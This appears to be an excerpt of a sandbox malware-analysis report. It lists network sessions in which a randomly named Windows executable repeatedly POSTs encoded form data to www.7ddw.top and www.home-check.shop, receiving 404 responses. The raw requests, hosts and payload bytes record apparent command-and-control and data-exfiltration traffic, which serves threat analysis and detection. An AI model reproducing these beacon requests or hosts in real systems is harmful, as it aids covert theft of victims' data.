                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.7ddw.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.7ddw.top/pcjw/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 46 70 4e 61 6f 64 77 74 6b 31 79 6a 4c 73 54 74 53 38 42 30 4a 43 75 56 68 54 54 38 4c 79 75 42 4c 2b 4c 32 51 75 46 31 69 64 77 4d 68 31 57 57 54 70 7a 5a 49 59 64 68 77 41 46 67 66 43 34 76 73 63 6d 63 59 59 65 7a 78 6b 79 4f 6b 76 32 6a 6d 53 77 6d 41 6b 4a 37 2b 44 52 38 41 59 38 6c 2f 6f 65 49 2f 4e 56 62 35 34 69 50 43 37 79 6e 48 2f 78 41 47 48 49 56 46 74 61 6e 49 48 56 39 6e 46 50 4c 45 34 71 44 30 6a 42 65 7a 69 32 45 68 51 69 46 31 46 36 4f 6a 7a 38 42 30 74 37 50 46 50 7a 75 45 4d 43 4e 57 53 65 39 37 59 69 68 53 55 75 54 59 7a 7a 78 31 35 46 5a 37 67 5a 45 47 67 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=FpNaodwtk1yjLsTtS8B0JCuVhTT8LyuBL+L2QuF1idwMh1WWTpzZIYdhwAFgfC4vscmcYYezxkyOkv2jmSwmAkJ7+DR8AY8l/oeI/NVb54iPC7ynH/xAGHIVFtanIHV9nFPLE4qD0jBezi2EhQiF1F6Ojz8B0t7PFPzuEMCNWSe97YihSUuTYzzx15FZ7gZEGg==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.904079914 CEST312INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:02 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              ETag: "66a62378-94"
                                                                                                                                                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              26192.168.11.2049767154.23.184.20780900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.442235947 CEST819OUTPOST /pcjw/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.7ddw.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.7ddw.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.7ddw.top/pcjw/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 46 70 4e 61 6f 64 77 74 6b 31 79 6a 4e 4e 6a 74 56 66 35 30 46 79 75 53 6b 54 54 38 65 43 75 4e 4c 2b 48 32 51 76 78 6c 68 75 55 4d 69 51 36 57 55 74 6e 5a 42 49 64 68 6f 51 46 6c 41 79 34 6d 73 63 71 2b 59 61 61 7a 78 6c 53 4f 6b 75 47 6a 6d 6c 6b 70 50 55 4a 31 6e 54 52 2b 4e 34 38 6c 2f 6f 65 49 2f 4a 39 78 35 34 4b 50 44 4c 69 6e 46 61 4e 48 46 48 49 57 53 64 61 6e 4d 48 56 68 6e 46 50 70 45 35 32 39 30 6d 46 65 7a 6e 4b 45 68 69 61 47 73 31 36 49 39 44 39 67 6b 76 61 72 49 63 50 35 4d 38 4c 51 55 79 4b 55 33 75 7a 37 50 6d 61 33 62 67 76 44 78 4a 38 78 35 69 59 66 62 74 2b 55 68 35 38 37 2b 47 72 64 4a 77 75 73 43 34 79 39 33 2f 77 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=FpNaodwtk1yjNNjtVf50FyuSkTT8eCuNL+H2QvxlhuUMiQ6WUtnZBIdhoQFlAy4mscq+YaazxlSOkuGjmlkpPUJ1nTR+N48l/oeI/J9x54KPDLinFaNHFHIWSdanMHVhnFPpE5290mFeznKEhiaGs16I9D9gkvarIcP5M8LQUyKU3uz7Pma3bgvDxJ8x5iYfbt+Uh587+GrdJwusC4y93/w=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.737360954 CEST312INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:05 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              ETag: "66a62378-94"
                                                                                                                                                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              27192.168.11.2049768154.23.184.20780900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.267095089 CEST2578OUTPOST /pcjw/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.7ddw.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.7ddw.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.7ddw.top/pcjw/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 46 70 4e 61 6f 64 77 74 6b 31 79 6a 4e 4e 6a 74 56 66 35 30 46 79 75 53 6b 54 54 38 65 43 75 4e 4c 2b 48 32 51 76 78 6c 68 75 63 4d 69 6d 75 57 53 50 50 5a 54 59 64 68 32 41 46 6b 41 79 35 6b 73 63 69 36 59 61 48 4f 78 67 57 4f 6b 4d 4f 6a 33 77 59 70 55 6b 4a 31 6f 7a 52 39 41 59 38 4b 2f 6f 76 44 2f 4e 52 78 35 34 4b 50 44 4f 6d 6e 57 76 78 48 4a 6e 49 56 46 74 61 37 49 48 56 64 6e 45 6d 65 45 35 79 74 7a 53 78 65 7a 48 36 45 6a 78 69 47 6b 31 36 4b 38 44 39 43 6b 76 57 30 49 63 54 66 4d 38 75 46 55 7a 53 55 33 76 57 47 4d 48 75 30 41 51 75 42 79 62 67 4b 76 53 30 71 56 76 4b 4f 77 61 6b 4f 78 42 65 4a 43 43 2b 64 46 59 4f 34 74 62 58 51 2f 4f 36 36 74 62 63 47 62 73 34 64 41 68 68 31 45 64 62 61 6a 54 79 48 64 2f 58 48 36 7a 58 41 39 53 31 75 7a 36 70 64 7a 57 46 6b 69 39 46 43 79 4b 2f 77 64 4a 72 4e 4c 50 6c 31 65 34 51 49 75 75 74 53 39 75 6b 70 46 66 34 4e 6b 45 62 6b 56 57 44 32 6c 36 42 70 30 64 6a 41 77 73 58 4a 4c 71 6e 76 4c 4b 79 47 50 6e 7a 63 77 45 34 44 50 74 68 4b 33 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=FpNaodwtk1yjNNjtVf50FyuSkTT8eCuNL+H2QvxlhucMimuWSPPZTYdh2AFkAy5ksci6YaHOxgWOkMOj3wYpUkJ1ozR9AY8K/ovD/NRx54KPDOmnWvxHJnIVFta7IHVdnEmeE5ytzSxezH6EjxiGk16K8D9CkvW0IcTfM8uFUzSU3vWGMHu0AQuBybgKvS0qVvKOwakOxBeJCC+dFYO4tbXQ/O66tbcGbs4dAhh1EdbajTyHd/XH6zXA9S1uz6pdzWFki9FCyK/wdJrNLPl1e4QIuutS9ukpFf4NkEbkVWD2l6Bp0djAwsXJLqnvLKyGPnzcwE4DPthK3ABCkraHptRUQRAF2LVzC5oR/MpZnWEo129o5xXiqqQEkRwhjMyPohpExuWq1v0dCiUth7qxNqEnEQJE9yHtcN4IWusZdB4EVRoxsYipzniGMyWm2pBY3DIprVv+qxO1F5+JIClvKA3DxxN29kYpAiOkTBiKiYV4WkhzqX11gmYyIOPjdyHQ/bn67lXddp3e3To3iuFYErYuii54BENMEWtSo35JSb6D4zUTt/nDDhAnny+NUcOMYGhzGXM4dyzCzKOzs2P+MkLZnbjDNyUczhUXLWLfB6wetM3cQ643fPLqxLAHimmfCDmmoHizGjUEKAKYMg+f5clb4EBF0g4ZISeVYn/Mrls3IeaK2W7Fb8KGh/IY2N1RA+Woam6A+qUS+c3wGXoq2VYjCA8zaFn9G/MXzKKcHqUlQzqTlld3FeOQg3p0+qv7YkInQpy2smZih6pebnUXBilRWigh8t/RDeY+X0OiwwFgJHJPTFakPZre0T/OviWQY3SY9IuMsw5dNbrIlUz+MsNMIfyoW2rMXayeCEKuvY00l48UNTmEaIUdCka1lwyCIlyK8huPfQV/i+Ljz0SREVSfzJBrvBbkCf+jc6SUA8deQe0W4F7fjtpC/3PG15pb1Tv2pXZuTxGo/VmMZgTh360zzE8ZXGNlfO+W4WNo1mlVVnX [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.267163038 CEST5390OUTData Raw: 6c 72 56 6d 62 54 30 73 53 52 45 4c 59 51 30 7a 66 6a 56 79 36 77 4f 4d 4f 63 43 57 51 71 33 51 38 37 39 76 43 47 39 76 54 78 68 38 6a 77 53 32 4b 78 37 6e 75 61 6e 69 67 69 31 2b 56 64 70 6e 53 4f 4e 48 48 77 49 36 39 4a 76 54 7a 66 43 4e 66 67
                                                                                                                                                                                                                                                              Data Ascii: lrVmbT0sSRELYQ0zfjVy6wOMOcCWQq3Q879vCG9vTxh8jwS2Kx7nuanigi1+VdpnSONHHwI69JvTzfCNfgRJ9bOFwkkG+VVMnYa6pErTqA9v6ONatMDjDezqPUlhFr3jHPogfzGFE+PvLmDu9ZLak9I3NuM8RUuqc17mnOMingp+dqvAhUIfd+V0RMuG2FaIhtDhCXsJP/z41aiMdJKRlh+Mv84cNOQv8ZlPQ3mYTuORIw//K05
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.563009024 CEST312INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:08 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              ETag: "66a62378-94"
                                                                                                                                                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              28192.168.11.2049769154.23.184.20780900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.092348099 CEST545OUTGET /pcjw/?9B6h=Irl6roAKlXX+S/z4d/JGSgOFtgPcZWv0Ad/WGuEavtEpunmIUZ/WLqk+3ThtGR85672FVpbJ7guSoPSbpRkmFzROuSw6a7kz1v/qj+IPw73pHtOII/dFP3E=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.7ddw.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.387381077 CEST312INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:11 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              ETag: "66a62378-94"
                                                                                                                                                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              29192.168.11.2049770185.230.15.380900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.736579895 CEST820OUTPOST /ns8q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.home-check.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.home-check.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.home-check.shop/ns8q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 46 6c 33 59 31 73 6c 4a 63 53 47 43 32 4b 65 55 4c 75 67 6e 57 61 59 35 6f 66 61 59 42 59 61 56 50 61 6f 47 6a 59 6a 2f 35 71 2f 57 58 68 35 33 4b 55 70 4d 52 58 70 72 47 67 66 74 46 2f 76 61 2f 59 4d 65 54 42 39 70 44 68 6a 75 6b 7a 39 58 42 69 69 6a 6b 66 62 45 71 45 69 41 75 2f 4c 2b 57 39 6e 48 51 61 58 30 39 50 54 61 58 4b 58 75 54 65 7a 77 59 57 55 77 6f 43 6d 7a 4a 77 6a 77 69 63 34 65 4b 36 4c 73 6b 4b 43 70 30 66 55 6c 4e 37 36 45 39 34 73 63 6b 46 73 31 61 52 38 62 54 5a 30 46 37 37 54 44 59 44 43 5a 4e 74 75 67 4a 6e 46 39 73 72 52 6b 42 7a 71 54 73 71 51 7a 63 51 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=Fl3Y1slJcSGC2KeULugnWaY5ofaYBYaVPaoGjYj/5q/WXh53KUpMRXprGgftF/va/YMeTB9pDhjukz9XBiijkfbEqEiAu/L+W9nHQaX09PTaXKXuTezwYWUwoCmzJwjwic4eK6LskKCp0fUlN76E94sckFs1aR8bTZ0F77TDYDCZNtugJnF9srRkBzqTsqQzcQ==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:17.016904116 CEST292INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:16 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              30192.168.11.2049771185.230.15.380900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:19.491672993 CEST840OUTPOST /ns8q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.home-check.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.home-check.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.home-check.shop/ns8q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 46 6c 33 59 31 73 6c 4a 63 53 47 43 77 65 69 55 4a 4a 30 6e 66 61 59 36 78 66 61 59 50 34 62 53 50 61 6b 47 6a 63 7a 76 2b 5a 58 57 58 41 4a 33 4c 57 42 4d 53 58 70 72 4a 41 65 70 47 50 76 6e 2f 59 52 6a 54 41 42 70 44 67 44 75 6b 78 6c 58 43 52 61 73 6d 50 61 69 73 45 69 43 7a 50 4c 2b 57 39 6e 48 51 61 54 65 39 50 4c 61 58 36 48 75 53 37 50 7a 57 32 55 76 68 69 6d 7a 4e 77 6a 38 69 63 34 38 4b 37 57 35 6b 50 47 70 30 62 59 6c 4d 76 75 48 6f 6f 73 67 67 46 74 79 65 45 5a 4c 56 61 39 31 2f 34 44 73 52 42 69 4f 46 62 2f 36 55 56 78 5a 76 34 4e 57 46 44 54 37 75 6f 52 6f 42 53 76 76 47 54 66 43 2b 4f 76 67 75 53 50 56 38 56 32 75 65 64 6b 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=Fl3Y1slJcSGCweiUJJ0nfaY6xfaYP4bSPakGjczv+ZXWXAJ3LWBMSXprJAepGPvn/YRjTABpDgDukxlXCRasmPaisEiCzPL+W9nHQaTe9PLaX6HuS7PzW2UvhimzNwj8ic48K7W5kPGp0bYlMvuHoosggFtyeEZLVa91/4DsRBiOFb/6UVxZv4NWFDT7uoRoBSvvGTfC+OvguSPV8V2uedk=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:19.772253990 CEST292INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:19 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              31192.168.11.2049772185.230.15.380900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.257788897 CEST2578OUTPOST /ns8q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.home-check.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.home-check.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.home-check.shop/ns8q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 46 6c 33 59 31 73 6c 4a 63 53 47 43 77 65 69 55 4a 4a 30 6e 66 61 59 36 78 66 61 59 50 34 62 53 50 61 6b 47 6a 63 7a 76 2b 5a 50 57 58 79 42 33 4b 33 42 4d 64 33 70 72 41 67 65 71 47 50 76 41 2f 59 4a 6e 54 41 4e 66 44 6b 7a 75 32 69 74 58 44 67 61 73 38 66 61 69 75 45 69 42 75 2f 4c 76 57 39 33 39 51 62 6a 65 39 50 4c 61 58 38 6a 75 56 75 7a 7a 55 32 55 77 6f 43 6d 76 4a 77 69 56 69 66 49 4e 4b 37 54 43 6a 38 2b 70 36 66 30 6c 4c 61 36 48 70 49 73 69 74 6c 74 51 65 45 63 52 56 61 51 47 2f 38 4c 43 52 41 6d 4f 47 65 4f 2f 48 30 68 66 78 49 4a 50 49 41 7a 4c 69 72 41 2b 49 56 6a 77 49 51 4c 58 79 49 48 32 72 69 66 72 35 33 79 33 4c 61 6a 79 65 6e 74 68 6b 51 50 6f 76 74 30 77 69 69 39 36 2f 6b 74 66 6a 33 47 53 50 74 2b 36 70 2b 48 6d 6b 61 48 4f 4a 55 66 59 35 31 68 4f 42 52 47 39 69 76 35 73 39 69 44 75 72 56 74 53 54 5a 6b 5a 59 7a 37 62 50 56 57 46 64 5a 51 5a 30 68 47 59 42 41 4e 5a 35 35 69 63 6e 75 62 67 56 67 43 68 53 55 72 6a 37 49 53 6f 2b 54 56 33 64 46 34 48 6e 65 32 4d 74 [TRUNCATED]
